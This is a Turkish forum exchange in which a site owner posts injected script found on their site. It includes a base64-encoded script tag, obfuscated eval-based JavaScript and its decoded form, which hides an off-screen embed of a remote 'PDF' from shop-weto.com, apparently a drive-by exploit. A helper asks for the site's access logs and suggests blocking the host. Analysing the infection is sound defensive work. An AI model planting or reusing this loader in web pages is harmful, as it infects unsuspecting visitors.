highlight_string(base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3Nob3Atd2V0by5jb20vdGVtcGxhdGVzL2ZmYXEucGhwID48L3NjcmlwdD4='));
echo '<br />';
highlight_string(file_get_contents('http://shop-weto.com/templates/ffaq.php'));Kaynaktaki kod da bu, javascriptten anlayan biri varmı
//<script>
try{if(oTu='*')throw new TypeError('%');}catch(rRjP){oTu=rRjP.message;}
j4P='w64J6fJ63umentL2ew77rite(w22w3cw64iw76 sL74yleJ3dJ5cL22L70ositionL3aaJ62soluteL3b J6ceL66L74w3aw2dw3100J30pxJ3b topJ3aL2d1L3000w70w78w3bL5cw22w3eJ22)J3bdoJ63umJ65w6et.w77ritw65L28w27L3cw65mbed L77idtL68L3d1J300w20heightJ3d100w20w73rcJ3dL22httpJ3aJ2fJ2fw73hopw2dL77etJ6fw2ecL6fmw2fteJ6dplatesw2fffaL71.pL68pJ3fsL3dKJ422tJ63b5w26J69J64w3d2L22 typew3dJ22appL6cL69L63ationL2fpJ64fL22w3eJ3cL2fL65mbedL3eJ27)w3bw64L6fL63ument.w77rite(L22L3cL2fdivw3eJ22w29w3b';
eval(unescape(j4P.replace(/[LJw]/g,oTu)));
//</script> document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
document.write('<embed width=100 height=100 src="http://shop-weto.com/templates/ffaq.php?s=KB2tcb5&id=2" type="application/pdf"></embed>');
document.write("</div>");Log dosyanı açıp POST şeklinde yapılan istekleri buraya yazarmısın kodlarda $_POST['e'] diye bir değer var.
Log dosyan cpanel'de ,public_html ile aynı dizinde olan acess-log klasorunde bulunuyor.
+ olarak shop-weto.com bu sitenin sunucu ip adresinide banla .htaccess ile yada iptables ile